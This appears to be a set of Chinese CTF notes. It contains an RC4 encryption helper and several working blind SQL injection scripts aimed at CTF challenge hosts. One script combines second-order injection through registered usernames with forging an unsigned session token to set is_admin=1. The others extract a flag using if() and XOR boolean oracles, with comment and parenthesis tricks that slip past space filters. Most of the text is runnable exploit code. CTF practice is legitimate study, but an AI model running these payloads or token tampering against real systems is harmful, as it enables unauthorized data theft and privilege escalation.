RC4加密脚本
import base64
from urllib import parse
def rc4_main(key="init_key", message="init_message"):
    """Encrypt *message* with RC4 under *key* and return the base64 text.

    The key-scheduled S-box is built from *key* and then consumed by the
    keystream generator; rc4_excrypt already returns a str, so its result
    is handed back unchanged.
    """
    sbox = rc4_init_sbox(key)
    return rc4_excrypt(message, sbox)
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
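def rc4_excrypt(plain, box):
    """Apply the RC4 pseudo-random generation algorithm (PRGA) to *plain*.

    Each character of *plain* is XORed (by code point) with the next keystream
    byte drawn from *box*; the resulting characters are joined into a str,
    UTF-8 encoded and then base64 encoded. This is deliberately not the raw
    RC4 byte stream: code points 0x80-0xFF become two UTF-8 bytes before the
    base64 step, which is the form the URL-encoding driver below expects.

    Args:
        plain: text to process (str).
        box: the 256-entry S-box from rc4_init_sbox(). It is copied, so the
            caller's list is left untouched (the original swapped entries in
            place, so a second call with the same box produced a different
            result).

    Returns:
        The base64 text as a str; an empty *plain* yields "".
    """
    state = list(box)
    out_chars = []
    i = j = 0
    for ch in plain:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        k = state[(state[i] + state[j]) % 256]
        out_chars.append(chr(ord(ch) ^ k))
    cipher = "".join(out_chars)
    return str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')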
# Interactive driver: read a key and a plaintext, RC4 them, then print the
# URL-encoded form of the raw cipher characters. The base64 returned by
# rc4_main is only an intermediate here and is decoded straight back.
key = input("请输入密钥:\n")  # "HereIsTreasure"
message = input("请输入明文:\n")
enc_base64 = rc4_main(key, message)
enc_init = base64.b64decode(enc_base64).decode('utf-8')
enc_url = parse.quote(enc_init)
print(f"rc4加密后的url编码:{enc_url}")
一个二次注入_盲注脚本
import requests
import base64
import json
# Challenge target the script was written against (as given on the page).
url = "http://challenge.qsnctf.com:32411/"
# Candidate alphabet for the character-by-character extraction below.
# NOTE: '\(' is not a recognised escape, so the backslash survives literally;
# the string therefore holds a backslash before '(' as well as the one from '\\'.
str1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}@#$\()*+,-./:;<=>?[\\]^`|~_&!%'
# Session shared by register() and home(); login() below posts without it.
s = requests.Session()
def register(username):
    """POST a new account with *username* and the fixed password "123".

    The response is discarded. The username is the carrier for every probe
    below; the page calls this a second-order injection, so the stored value
    is presumably what home.php later evaluates — verify against the target.
    From a defender's view the signal is the volume of registrations whose
    usernames contain quote characters and '/**/'.
    """
    data = {"username":username,"password":"123"}
    r = s.post(url+'register.php',data)
    #print(r.text)
def login(username):
    """Log in as *username* and return the value part of the first Set-Cookie.

    Uses requests.post directly rather than the module session `s`, and
    disables redirects — presumably so the Set-Cookie of the initial response
    is read rather than that of a follow-up page.  The header is split on
    '=' and element 1 taken, i.e. the text between the first and second '='
    (so attributes such as "; Path=" would be cut off).  Raises KeyError if
    the response carries no Set-Cookie header.
    """
    data = {"username":username,"password":"123"}
    res = requests.post(url+'login.php',data,allow_redirects=False)
    cookie = res.headers['Set-Cookie'].split('=')[1]
    return cookie
def home(token):
    """GET home.php with cookie TOKEN=token and return the 'seached-text' div body.

    The HTML is split on the div's opening tag and then on the next '</div>';
    an IndexError is raised if the opening marker is absent.  '<br>' is
    rewritten to newlines before returning.
    """
    cookies = {"TOKEN":token}
    r = s.get(url+'home.php',cookies=cookies)
    res = r.text.split('<div class="seached-text">')[1].split('</div>')[0]
    res = res.replace('<br>','\n')
    #print(res)
    return res
def token_fix(token):
    """Re-encode a session token so its embedded JSON carries is_admin=1.

    As the code treats it, the token is hex(base64(json)): it is decoded in
    that order, the is_admin field is set to 1, and the result re-encoded
    the same way.  Nothing in this round trip touches a signature or MAC,
    which is what lets the edit go through — a token that carries
    authorisation claims must be signed (or be an opaque server-side
    reference) so clients cannot rewrite it.  Raises ValueError
    (json.JSONDecodeError is a subclass) or binascii.Error when the input
    does not have that shape.
    """
    token = bytes.fromhex(token)
    token = base64.b64decode(token)
    token = json.loads(token)
    # print(token)
    token['is_admin']=1
    token = json.dumps(token)
    token = base64.b64encode(token.encode())
    token = token.hex()
    return token
def request(username):
    """One oracle round trip: register, log in, rewrite the token, read home.php.

    Every call costs three HTTP requests and creates a fresh account, so a
    single extracted character costs up to len(str1) such rounds.
    Returns the div text from home(); the callers test it for 'No user found'.
    """
    register(username)
    token = login(username)
    token = token_fix(token)
    res = home(token)
    return res
def database_length():
    """Probe length(database()) for 0..9 and return the first accepted value.

    The oracle is the absence of 'No user found' in the home page text.
    Spaces in the payload are replaced with '/**/', presumably to pass a
    filter on literal spaces; detection rules keyed only on spaces miss this.
    Returns 0 both for a real length of 0 and when nothing in 0..9 matches,
    so the caller cannot tell the two apart.
    """
    for i in range(10):
        username = "admin'and length(database()) = {}#".format(i)
        username = username.replace(' ','/**/')
        res = request(username)
        if 'No user found' not in res:
            print('database_length: ',i)
            return i
    return 0
def database_name(length):
    """Recover the database name one position at a time and print it.

    For each position 1..length every character of str1 is tried; the first
    one the oracle accepts is appended.  If no character matches, the
    position is silently skipped.  The name is only printed — unlike
    table_name()/column_name() nothing is returned.
    """
    name = ''
    for idx in range(1,length+1):
        for char in str1:
            payload = "admin'and substr(database(),{},1) = '{}'#".format(idx,char)
            payload = payload.replace(' ','/**/')
            res = request(payload)
            if 'No user found' not in res:
                name += char
                print(name)
                break
def table_length():
    """Find the name length of each table in schema dkctf, keyed by table index.

    For index i in 0..19 the lengths j in 0..19 are tried in order and the
    first accepted one stored in cnt[i].  `flag` is reset to 0 on every
    inner iteration and only set to 1 on a hit, so when no length matches
    for some i the scan stops and the dict collected so far is returned —
    that is how the end of the table list is detected.
    """
    cnt = {}
    for i in range(20):
        flag = 1
        for j in range(20):
            flag = 0
            payload = "admin'and length((select table_name from information_schema.tables where table_schema='dkctf' limit {},1))={}#".format(i,j)
            payload = payload.replace(' ','/**/')
            res = request(payload)
            #print(res)
            if 'No user found' not in res:
                print('table_length: ',i,j)
                cnt[i]=j
                flag = 1
                break
        if flag == 0:
            return cnt
    return cnt
def table_name(cnt):
    """Recover each table name from its length map and return {index: name}.

    Args:
        cnt: the {table index: name length} dict from table_length(); indices
            0..len(cnt)-1 are assumed to all be present.

    For every position of every table each character of str1 is tried and
    the first accepted one appended; a position with no match is skipped.
    """
    tables={}
    for i in range(len(cnt)):
        table = ''
        for j in range(1,cnt[i]+1):
            for char in str1:
                payload = "admin'and substr((select table_name from information_schema.tables where table_schema='dkctf' limit {},1),{},1)='{}'#".format(i,j,char)
                payload = payload.replace(' ','/**/')
                res = request(payload)
                #print(res)
                if 'No user found' not in res:
                    table += char
                    print(i,table)
                    break
        tables[i]=table
    return tables
def column_length():
    """Find the name length of each column of dkctf.secret, keyed by column index.

    Same scheme as table_length() (indices 0..9, lengths 0..19, stop at the
    first index with no match).  Unlike its sibling this one prints every
    oracle response, which is noisy but otherwise harmless.
    """
    cnt = {}
    for i in range(10):
        flag = 1
        for j in range(20):
            flag = 0
            payload = "admin'and length((select column_name from information_schema.columns where table_schema='dkctf' and table_name='secret' limit {},1))={}#".format(i,j)
            payload = payload.replace(' ','/**/')
            res = request(payload)
            print(res)
            if 'No user found' not in res:
                print('column_length: ',i,j)
                cnt[i]=j
                flag = 1
                break
        if flag == 0:
            return cnt
    return cnt
def column_name(cnt):
    """Recover each column name of dkctf.secret and return {index: name}.

    Args:
        cnt: the {column index: name length} dict from column_length();
            indices 0..len(cnt)-1 are assumed to all be present.

    Mirrors table_name(): positions with no accepted character are skipped.
    """
    columns={}
    for i in range(len(cnt)):
        column = ''
        for j in range(1,cnt[i]+1):
            for char in str1:
                payload = "admin'and substr((select column_name from information_schema.columns where table_schema='dkctf' and table_name='secret' limit {},1),{},1)='{}'#".format(i,j,char)
                payload = payload.replace(' ','/**/')
                res = request(payload)
                #print(res)
                if 'No user found' not in res:
                    column += char
                    print(i,column)
                    break
        columns[i]=column
    return columns
def data():
    """Extract the sseeccrreett column of table secret, printing as it goes.

    Positions 1..99 are probed and compared by ord() rather than by quoted
    character.  There is no stop condition once the value ends: the outer
    loop always runs all 99 positions, and positions with no match are
    skipped.  Nothing is returned; the accumulated value is only printed.
    """
    flag = ''
    for i in range(1,100):
        for char in str1:
            payload = "admin'and ord(substr((select sseeccrreett from secret),{},1))={}#".format(i,ord(char))
            payload = payload.replace(' ','/**/')
            res = request(payload)
            #print(res)
            if 'No user found' not in res:
                flag += char
                print(i,flag)
                break
if __name__ == '__main__':
    # Steps 1-3 are left commented out by the author, with the values they
    # produced recorded inline; only the final data dump still runs.
    # Step 1: database name (dkctf)
    # length = database_length() # 5
    # database_name(length) # dkctf
    # Step 2: table names (user, secret)
    # table_length = table_length() # {0: 4, 1: 6}
    # print(table_length)
    # tables = table_name(table_length) # {0: 'user', 1: 'secret'}
    # print(tables)
    # Step 3: column names of the secret table {0: 'flag', 1: 'sseeccrreett'}
    # column_length = column_length()
    # column_length = {0: 4, 1: 12}
    # print(column_length)
    # columns = column_name(column_length)
    # print(columns) # {0: 'flag', 1: 'sseeccrreett'}
    # Step 4: dump the sseeccrreett column of table secret
    #
    data()
盲注
SQL的三目运算
if(表达式1,表达式2,表达式3)
如果表达式1是正确的,那么执行表达式2,否则执行表达式3。
构建payload:if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
如果if条件成立,则执行1,否则执行2。
import requests
import time
# Challenge target (as given on the page); the `id` form field is the carrier.
url = 'http://35a3724e-07df-4562-a21b-bfbf5b06b2d2.node4.buuoj.cn:81/index.php'
result = ''
# One character per outer iteration, found by binary search over ASCII 32..126.
for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # Oracle: 'Hello' in the response means the character at position x is > mid.
        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)" % (x, mid)
        data = {
            "id":payload
        }
        response = requests.post(url, data = data)
        time.sleep(0.1)  # pause between probes
        if 'Hello' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Loop exits with low == high, so mid == low is the found code point.
    # There is no stop once the value ends; all 49 positions are always probed.
    result += chr(int(mid))
    print(result)
SQL异或运算
假^假=假,真^真=假,假^真=真,真^假=真。null^any=null。
当我们查询 1^0、0^1、和1的回显是正常的,而查询1^1和0^0会有报错提示。
构造0^payload,若payload结果为真,则返回…;反之…
用括号来代替空格,构造payload:1^(ascii(substr((select(flag)from(flag)),1,1))>1)
- substr():截取查询结果的从第一字符开始的一个字符
- ascii():ascii值>1指这个值不为NULL
import requests
import time
import re
# Challenge target (as given on the page); the `id` form field is the carrier.
url='http://a7496ddf-f4d9-410a-94da-53ab915296e3.node4.buuoj.cn:81/index.php'
flag = ''
# One character per outer iteration, positions 1..42.
for i in range(1,43):
    # NOTE: `max`/`min` shadow the builtins for the rest of the script.
    max = 127
    min = 0
    # `c` is only a bound on the number of halving steps; it is never used.
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.1)  # pause between probes
        # Oracle: the greeting present means the code point is <= s, so the
        # upper bound moves down; otherwise the lower bound moves up.
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            max=s
        else:
            min=s
        # The interval has closed to width 1; `max` is taken as the code point.
        if((max-min)<=1):
            flag+=chr(max)
            break
    print(flag)